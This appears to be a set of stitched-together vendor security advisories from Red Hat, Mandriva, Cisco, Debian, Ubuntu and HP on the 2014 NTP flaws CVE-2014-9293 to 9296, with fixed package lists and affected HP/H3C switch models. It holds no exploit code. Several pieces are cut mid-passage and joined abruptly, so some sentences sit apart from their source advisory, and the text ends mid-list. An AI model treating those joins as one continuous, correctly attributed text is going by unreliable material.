http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296\n http://advisories.mageia.org/MGASA-2014-0541.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n 25fe56fc0649ac9bb83be467969c2380 mbs1/x86_64/ntp-4.2.6p5-8.1.mbs1.x86_64.rpm\n 9409f5337bc2a2682e09db81e769cd5c mbs1/x86_64/ntp-client-4.2.6p5-8.1.mbs1.x86_64.rpm\n df65cc9c536cdd461e1ef95318ab0d3b mbs1/x86_64/ntp-doc-4.2.6p5-8.1.mbs1.x86_64.rpm \n 53f446bffdf6e87726a9772e946c5e34 mbs1/SRPMS/ntp-4.2.6p5-8.1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. 6.5) - i386, noarch, ppc64, s390x, x86_64\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: ntp security update\nAdvisory ID: RHSA-2014:2024-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-2024.html\nIssue date: 2014-12-20\nCVE Names: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 \n CVE-2014-9296 \n=====================================================================\n\n1. Summary:\n\nUpdated ntp packages that fix several security issues are now available\nfor Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available from the CVE link in the\nReferences section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. Description:\n\nThe Network Time Protocol (NTP) is used to synchronize a computer\u0027s time\nwith a referenced time source. \n\nMultiple buffer overflow flaws were discovered in ntpd\u0027s crypto_recv(),\nctl_putdata(), and configure() functions. A remote attacker could use\neither of these flaws to send a specially crafted request packet that could\ncrash ntpd or, potentially, execute arbitrary code with the privileges of\nthe ntp user. Note: the crypto_recv() flaw requires non-default\nconfigurations to be active, while the ctl_putdata() flaw, by default, can\nonly be exploited via local attackers, and the configure() flaw requires\nadditional authentication to exploit. (CVE-2014-9295)\n\nIt was found that ntpd automatically generated weak keys for its internal\nuse if no ntpdc request authentication key was specified in the ntp.conf\nconfiguration file. A remote attacker able to match the configured IP\nrestrictions could guess the generated key, and possibly use it to send\nntpdc query or configuration requests. (CVE-2014-9293)\n\nIt was found that ntp-keygen used a weak method for generating MD5 keys. Note: it is\nrecommended to regenerate any MD5 keys that had explicitly been generated\nwith ntp-keygen; the default installation does not contain such keys). \n(CVE-2014-9294)\n\nA missing return statement in the receive() function could potentially\nallow a remote attacker to bypass NTP\u0027s authentication mechanism. \n(CVE-2014-9296)\n\nAll ntp users are advised to upgrade to this updated package, which\ncontains backported patches to resolve these issues. After installing the\nupdate, the ntpd daemon will restart automatically. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata \nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at \nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1176032 - CVE-2014-9293 ntp: automatic generation of weak default key in config_auth()\n1176035 - CVE-2014-9294 ntp: ntp-keygen uses weak random number generator and seed when generating MD5 keys\n1176037 - CVE-2014-9295 ntp: Multiple buffer overflows via specially-crafted packets\n1176040 - CVE-2014-9296 ntp: receive() missing return on error\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nntp-4.2.6p5-2.el6_6.src.rpm\n\ni386:\nntp-4.2.6p5-2.el6_6.i686.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm\nntpdate-4.2.6p5-2.el6_6.i686.rpm\n\nx86_64:\nntp-4.2.6p5-2.el6_6.x86_64.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntpdate-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm\nntp-perl-4.2.6p5-2.el6_6.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-2.el6_6.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntp-perl-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nntp-4.2.6p5-2.el6_6.src.rpm\n\nx86_64:\nntp-4.2.6p5-2.el6_6.x86_64.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntpdate-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nnoarch:\nntp-doc-4.2.6p5-2.el6_6.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntp-perl-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nntp-4.2.6p5-2.el6_6.src.rpm\n\ni386:\nntp-4.2.6p5-2.el6_6.i686.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm\nntpdate-4.2.6p5-2.el6_6.i686.rpm\n\nppc64:\nntp-4.2.6p5-2.el6_6.ppc64.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.ppc64.rpm\nntpdate-4.2.6p5-2.el6_6.ppc64.rpm\n\ns390x:\nntp-4.2.6p5-2.el6_6.s390x.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.s390x.rpm\nntpdate-4.2.6p5-2.el6_6.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-2.el6_6.x86_64.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntpdate-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm\nntp-perl-4.2.6p5-2.el6_6.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-2.el6_6.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-2.el6_6.ppc64.rpm\nntp-perl-4.2.6p5-2.el6_6.ppc64.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-2.el6_6.s390x.rpm\nntp-perl-4.2.6p5-2.el6_6.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntp-perl-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nntp-4.2.6p5-2.el6_6.src.rpm\n\ni386:\nntp-4.2.6p5-2.el6_6.i686.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm\nntpdate-4.2.6p5-2.el6_6.i686.rpm\n\nx86_64:\nntp-4.2.6p5-2.el6_6.x86_64.rpm\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntpdate-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm\nntp-perl-4.2.6p5-2.el6_6.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-2.el6_6.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm\nntp-perl-4.2.6p5-2.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nntp-4.2.6p5-19.el7_0.src.rpm\n\nx86_64:\nntp-4.2.6p5-19.el7_0.x86_64.rpm\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nntpdate-4.2.6p5-19.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-19.el7_0.noarch.rpm\nntp-perl-4.2.6p5-19.el7_0.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nsntp-4.2.6p5-19.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nntp-4.2.6p5-19.el7_0.src.rpm\n\nx86_64:\nntp-4.2.6p5-19.el7_0.x86_64.rpm\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nntpdate-4.2.6p5-19.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-19.el7_0.noarch.rpm\nntp-perl-4.2.6p5-19.el7_0.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nsntp-4.2.6p5-19.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nntp-4.2.6p5-19.el7_0.src.rpm\n\nppc64:\nntp-4.2.6p5-19.el7_0.ppc64.rpm\nntp-debuginfo-4.2.6p5-19.el7_0.ppc64.rpm\nntpdate-4.2.6p5-19.el7_0.ppc64.rpm\n\ns390x:\nntp-4.2.6p5-19.el7_0.s390x.rpm\nntp-debuginfo-4.2.6p5-19.el7_0.s390x.rpm\nntpdate-4.2.6p5-19.el7_0.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-19.el7_0.x86_64.rpm\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nntpdate-4.2.6p5-19.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-19.el7_0.noarch.rpm\nntp-perl-4.2.6p5-19.el7_0.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-19.el7_0.ppc64.rpm\nsntp-4.2.6p5-19.el7_0.ppc64.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-19.el7_0.s390x.rpm\nsntp-4.2.6p5-19.el7_0.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nsntp-4.2.6p5-19.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nntp-4.2.6p5-19.el7_0.src.rpm\n\nx86_64:\nntp-4.2.6p5-19.el7_0.x86_64.rpm\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nntpdate-4.2.6p5-19.el7_0.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-19.el7_0.noarch.rpm\nntp-perl-4.2.6p5-19.el7_0.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm\nsntp-4.2.6p5-19.el7_0.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-9293\nhttps://access.redhat.com/security/cve/CVE-2014-9294\nhttps://access.redhat.com/security/cve/CVE-2014-9295\nhttps://access.redhat.com/security/cve/CVE-2014-9296\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUlOKcXlSAg2UNWIIRAvBoAKCfw+j4ua5JaIRMc5eKkny9G1yWlgCgufNc\nEvBImTd+Vq7//UExow1FP4U=\n=m/Eb\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nOn December 19, 2014, NTP.org and US-CERT released security advisories detailing two issues regarding weak cryptographic pseudorandom number generation (PRNG), three buffer overflow vulnerabilities, and an unhandled error condition with an unknown impact. \n\nCisco will release free software updates that address these vulnerabilities. \n\nWorkarounds that mitigate these vulnerabilities are available. Attackers could use this key to\n reconfigure ntpd (or to exploit other vulnerabilities). \n\nThe default ntpd configuration in Debian restricts access to localhost\n(and possible the adjacent network in case of IPv6). \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1:4.2.6.p5+dfsg-2+deb7u1. \n\nWe recommend that you upgrade your ntp packages. ============================================================================\nUbuntu Security Notice USN-2449-1\nDecember 22, 2014\n\nntp vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. The default compiler options for affected releases should reduce the\nvulnerability to a denial of service. In addition, attackers would be\nisolated by the NTP AppArmor profile. (CVE-2014-9295)\n\nStephen Roettger discovered that NTP incorrectly continued processing when\nhandling certain errors. (CVE-2014-9296)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.10:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.10.1\n\nUbuntu 14.04 LTS:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.1\n\nUbuntu 12.04 LTS:\n ntp 1:4.2.6.p3+dfsg-1ubuntu3.2\n\nUbuntu 10.04 LTS:\n ntp 1:4.2.4p8+dfsg-1ubuntu2.2\n\nAfter a standard system update you need to regenerate any MD5 keys that\nwere manually created with ntp-keygen. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04574882\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04574882\nVersion: 1\n\nHPSBPV03266 rev.1 - Certain HP Networking and H3C Switches and Routers\nrunning NTP, Remote Execution of Code, Disclosure of Information, and Denial\nof Service (DoS)\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-02-18\nLast Updated: 2015-02-18\n\nPotential Security Impact: Remote execution of code and disclosure of\ninformation and denial of service (DoS)\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with certain HP\nNetworking and H3C switches and routers running NTP. The vulnerabilities\ncould be exploited remotely to allow execution of code, disclosure of\ninformation and denial of service (DoS). \n\nReferences:\n\nCVE-2014-9293\nCVE-2014-9294\nCVE-2014-9295\nVU#852879\nSSRT101878\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nSee resolution table\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-9293 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9294 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9295 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided a mitigation for the impacted HP and H3C products. \n\nMitigation for impacted products: disable NTP, until an update is available. \n\nFamily\n Fixed Version\n HP Branded Products Impacted\n H3C Branded Products Impacted\n 3Com Branded Products Impacted\n\n12900 Switch Series\n Fix in Progress, Use Mitigation\n JG619A HP FF 12910 Switch AC Chassis, JG621A HP FF 12910 Main Processing\nUnit, JG632A HP FF 12916 Switch AC Chassis, JG634A HP FF 12916 Main\nProcessing Unit\n N/A\n N/A\n\n12500\n Fix in Progress, Use Mitigation\n JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP\n12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504\nAC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch\nChassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis,\nJF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP\n12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JC808A HP\n12500 TAA Main Processing Unit\n H3C S12508 Routing Switch(AC-1) (0235A0GE), H3C S12518 Routing Switch(AC-1)\n(0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis (0235A38N), H3C\nS12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M) , H3C 12508 DC\nSwitch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K)\n N/A\n\n12500 (Comware v7)\n Fix in Progress, Use Mitigation\n JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP\n12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504\nAC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch\nChassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis,\nJF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP\n12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JG497A HP\n12500 MPU w/Comware V7 OS, JG782A HP FF 12508E AC Switch Chassis, JG783A HP\nFF 12508E DC Switch Chassis, JG784A HP FF 12518E AC Switch Chassis, JG785A HP\nFF 12518E DC Switch Chassis, JG802A HP FF 12500E MPU\n H3C S12508 Routing Switch(AC-1) (0235A0GE), H3C S12518 Routing Switch(AC-1)\n(0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis (0235A38N), H3C\nS12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M), H3C 12508 DC Switch\nChassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K)\n N/A\n\n11900 Switch Series\n Fix in Progress, Use Mitigation\n JG608A HP FF 11908-V Switch Chassis, JG609A HP FF 11900 Main Processing Unit\n N/A\n N/A\n\n10500 Switch Series (Comware v5)\n R1208P10\n JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP\n10504 Switch Chassis, JC614A HP 10500 Main Processing Unit, JC748A HP 10512\nSwitch Chassis, JG375A HP 10500 TAA Main Processing Unit, JG820A HP 10504 TAA\nSwitch Chassis, JG821A HP 10508 TAA Switch Chassis, JG822A HP 10508-V TAA\nSwitch Chassis, JG823A HP 10512 TAA Switch Chassis\n N/A\n N/A\n\n10500 Switch Series (Comware v7)\n Fix in Progress, Use Mitigation\n JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP\n10504 Switch Chassis, JC748A HP 10512 Switch Chassis, JG820A HP 10504 TAA\nSwitch Chassis, JG821A HP 10508 TAA Switch Chassis, JG822A HP 10508-V TAA\nSwitch Chassis, JG823A HP 10512 TAA Switch Chassis, JG496A HP 10500 Type A\nMPU w/Comware v7 OS\n N/A\n N/A\n\n9500E\n Fix in Progress, Use Mitigation\n JC124A HP A9508 Switch Chassis, JC124B HP 9505 Switch Chassis, JC125A HP\nA9512 Switch Chassis, JC125B HP 9512 Switch Chassis, JC474A HP A9508-V Switch\nChassis, JC474B HP 9508-V Switch Chassis\n H3C S9505E Routing-Switch Chassis (0235A0G6), H3C S9512E Routing-Switch\nChassis (0235A0G7), H3C S9508E-V Routing-Switch Chassis (0235A38Q), H3C\nS9505E Chassis w/ Fans (0235A38P), H3C S9512E Chassis w/ Fans (0235A38R)\n N/A\n\n8800\n Fix in Progress, Use Mitigation\n JC141A HP 8802 Main Control Unit Module, JC147A HP 8802 Router Chassis,\nJC147B HP 8802 Router Chassis, JC148A HP A8805 Router Chassis, JC148B HP 8805\nRouter Chassis, JC137A HP 8805/08/12 (2E) Main Cntrl Unit Mod, JC138A HP\n8805/08/12 (1E) Main Cntrl Unit Mod, JC149A HP A8808 Router Chassis, JC149B\nHP 8808 Router Chassis, JC150A HP A8812 Router Chassis, JC150B HP 8812 Router\nChassis\n H3C Main Control Unit for SR8802 (0231A84N), H3C SR8802 10G Core Router\nChassis (0235A31B), H3C SR8802 10G Core Router Chassis (0235A0GC), H3C SR8805\n10G Core Router Chassis (0235A31C), H3C SR8805 10G Core Router Chassis\n(0235A0G8), H3C SR8800 Routing Switch Processing Board(0231A80E), H3C Main\nContril Unit for SR8805/08/12 IE (0231A82E), H3C SR8808 10G Core Router\nChassis (0235A31D / 0235A0G9, H3C SR8812 10G Core Router Chassis (0235A31E /\n0235A0GA)\n N/A\n\n7900\n Fix in Progress, Use Mitigation\n JG682A HP FlexFabric 7904 Switch Chassis, JH001A HP FF 7910 2.4Tbps Fabric /\nMPU, JG842A HP FF 7910 7.2Tbps Fabric / MPU, JG841A HP FF 7910 Switch Chassis\n N/A\n N/A\n\n7500 Switch Series\n R6708P10\n JC666A HP A7503-S 144 Gbps Fab/MPU w 24p Gig-T, JC697A HP A7502 TAA Main\nProcessing Unit, JC698A HP A7503S 144 Gbps TAA Fab/MPU w 24p GbE, JC699A HP\nA7500 384Gbps TAA Fab/MPU w 2p 10-GbE, JC700A HP A7500 384 Gbps TAA Fabric /\nMPU, JC701A HP A7510 768 Gbps TAA Fabric / MPU, JD193A HP 384 Gbps A7500 Fab\nMod w/2 XFP Ports, JD193B HP 7500 384Gbps Fab Mod w/2 XFP Ports, JD194A HP\n384 Gbps Fabric A7500 Module, JD194B HP 7500 384Gbps Fabric Module, JD195A HP\n7500 384Gbps Advanced Fabric Module, JD196A HP 7502 Fabric Module, JD220A HP\n7500 768Gbps Fabric Module, JD238A HP A7510 Switch Chassis, JD238B HP 7510\nSwitch Chassis, JD239A HP A7506 Switch Chassis, JD239B HP 7506 Switch\nChassis, JD240A HP A7503 Switch Chassis, JD240B HP 7503 Switch Chassis,\nJD241A HP A7506 Vertical Switch Chassis, JD241B HP 7506-V Switch Chassis,\nJD242A HP A7502 Switch Chassis, JD242B HP 7502 Switch Chassis, JD243A HP\nA7503 Switch Chassis w/1 Fabric Slot, JD243B HP 7503-S Switch Chassis w/1\nFabric Slot\n H3C S7502E Ethernet Switch Chassis with Fan (0235A0G4), H3C S7503E Ethernet\nSwitch Chassis with Fan (0235A0G2), H3C S7503E-S Ethernet Switch Chassis with\nFan (0235A0G5), H3C S7506E Ethernet Switch Chassis with Fan (0235A0G1), H3C\nS7506E-V Ethernet Switch Chassis with Fan (0235A0G3), H3C S7510E Ethernet\nSwitch Chassis with Fan (0235A0G0), H3C S7502E Chassis w/ fans (0235A29A),\nH3C S7503E Chassis w/ fans (0235A27R), H3C S7503E-S Chassis w/ fans\n(0235A33R), H3C S7506E Chassis w/ fans (0235A27Q), H3C S7506E-V Chassis w/\nfans (0235A27S)\n N/A\n\nHSR6800\n Fix in Progress, Use Mitigation\n JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A\nHP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router MPU, JG779A HP\nHSR6800 RSE-X2 Router TAA MPU\n N/A\n N/A\n\nHSR6800 Russian Version\n Fix in Progress, Use Mitigation\n JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A\nHP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router MPU, JG779A HP\nHSR6800 RSE-X2 Router TAA MPU\n N/A\n N/A\n\nHSR6602\n Fix in Progress, Use Mitigation\n JG353A HP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG776A HP HSR6602-G\nTAA Router, JG777A HP HSR6602-XG TAA Router, JG777A HP HSR6602-XG TAA Router\n N/A\n N/A\n\nHSR6602 Russian Version\n Fix in Progress, Use Mitigation\n JG353A HP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG776A HP HSR6602-G\nTAA Router, JG777A HP HSR6602-XG TAA Router\n N/A\n N/A\n\n6602\n Fix in Progress, Use Mitigation\n JC176A HP 6602 Router Chassis\n H3C SR6602 1U Router Host (0235A27D)\n N/A\n\n6602 Russian Version\n Fix in Progress, Use Mitigation\n JC176A HP 6602 Router Chassis\n H3C SR6602 1U Router Host (0235A27D)\n N/A\n\nA6600\n Fix in Progress, Use Mitigation\n JC165A HP 6600 RPE-X1 Router Module, JC177A HP 6608 Router, JC177B HP A6608\nRouter Chassis, JC178A HP 6604 Router Chassis, JC178B HP A6604 Router\nChassis, JC496A HP 6616 Router Chassis, JC566A HP A6600 RSE-X1 Main\nProcessing Unit, JG780A HP 6600 RSE-X1 Router TAA MPU\n H3C RT-SR66-RPE-X1-H3 (0231A761), H3C RT-SR6608-OVS-H3 (0235A32X), H3C\nRT-SR6604-OVS-H3 (0235A37X), H3C SR6616 Router Chassis (0235A41D)\n N/A\n\nA6600 Russian Version\n Fix in Progress, Use Mitigation\n JC165A HP 6600 RPE-X1 Router Module, JC177A HP 6608 Router, JC177B HP A6608\nRouter Chassis, JC178A HP 6604 Router Chassis, JC178B HP A6604 Router\nChassis, JC496A HP 6616 Router Chassis, JC566A HP A6600 RSE-X1 Main\nProcessing Unit, JG780A HP 6600 RSE-X1 Router TAA MPU\n H3C RT-SR66-RPE-X1-H3 (0231A761), H3C RT-SR6608-OVS-H3 (0235A32X), H3C\nRT-SR6604-OVS-H3 (0235A37X), H3C SR6616 Router Chassis (0235A41D)\n N/A\n\n6600 MCP\n Fix in Progress, Use Mitigation\n JC177A HP 6608 Router, JC177B HP A6608 Router Chassis, JC178A HP 6604 Router\nChassis, JC178B HP A6604 Router Chassis, JC496A HP 6616 Router Chassis,\nJG778A HP 6600 MCP-X2 Router TAA MPU. JG355A HP 6600 MCP-X1 Router MPU,\nJG356A HP 6600 MCP-X2 Router MPU\n H3C RT-SR6608-OVS-H3 (0235A32X), H3C RT-SR6604-OVS-H3 (0235A37X), H3C SR6616\nRouter Chassis (0235A41D)\n N/A\n\n6600 MCP Russian Version\n Fix in Progress, Use Mitigation\n JC177A HP 6608 Router, JC177B HP A6608 Router Chassis, JC178A HP 6604 Router\nChassis, JC178B HP A6604 Router Chassis, JC496A HP 6616 Router Chassis,\nJG355A HP 6600 MCP-X1 Router MPU, JG356A HP 6600 MCP-X2 Router MPU, JG776A HP\nHSR6602-G TAA Router, JG777A HP HSR6602-XG TAA Router, JG778A HP 6600 MCP-X2\nRouter TAA MPU,\n H3C RT-SR6608-OVS-H3 (0235A32X), H3C RT-SR6604-OVS-H3 (0235A37X), H3C SR6616\nRouter Chassis (0235A41D)\n N/A\n\n5920 Switch Series\n Fix in Progress, Use Mitigation\n JG296A HP 5920AF-24XG Switch, JG555A HP 5920AF-24XG TAA Switch\n N/A\n N/A\n\n5900 Switch Series\n Fix in Progress, Use Mitigation\n JC772A HP 5900AF-48XG-4QSFP+ Switch, JG336A HP 5900AF-48XGT-4QSFP+ Switch,\nJG510A HP 5900AF-48G-4XG-2QSFP+ Switch, JG554A HP 5900AF-48XG-4QSFP+ TAA\nSwitch, JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n N/A\n N/A\n\n5830 Switch Series\n Fix in Progress, Use Mitigation\n JC691A HP A5830AF-48G Switch w/1 Interface Slot, JC694A HP A5830AF-96G\nSwitch, JG316A HP 5830AF-48G TAA Switch w/1 Intf Slot, JG374A HP 5830AF-96G\nTAA Switch\n N/A\n N/A\n\n5820 Switch Series\n Fix in Progress, Use Mitigation\n JC102A HP 5820-24XG-SFP+ Switch, JC106A HP 5820-14XG-SFP+ Switch with 2\nSlots, JG219A HP 5820AF-24XG Switch, JG243A HP 5820-24XG-SFP+ TAA-compliant\nSwitch, JG259A HP 5820X-14XG-SFP+ TAA Switch w 2 Slots\n H3C S5820X-28C 14 port (SFP Plus ) Plus 4-port BT (RJ45) Plus 2 media\nmodules Plus OSM (0235A37L), H3C S5820X-28S 24-port 10GBASE-X (SFP Plus )\nPlus 4-port 10/100/1000BASE-T (RJ45) (0235A370)\n N/A\n\n5800 Switch Series\n Fix in Progress, Use Mitigation\n JC099A HP 5800-24G-PoE Switch, JC100A HP 5800-24G Switch, JC101A HP 5800-48G\nSwitch with 2 Slots, JC103A HP 5800-24G-SFP Switch, JC104A HP 5800-48G-PoE\nSwitch, JC105A HP 5800-48G Switch, JG225A HP 5800AF-48G Switch, JG242A HP\n5800-48G-PoE+ TAA Switch w 2 Slots, JG254A HP 5800-24G-PoE+ TAA-compliant\nSwitch, JG255A HP 5800-24G TAA-compliant Switch, JG256A HP 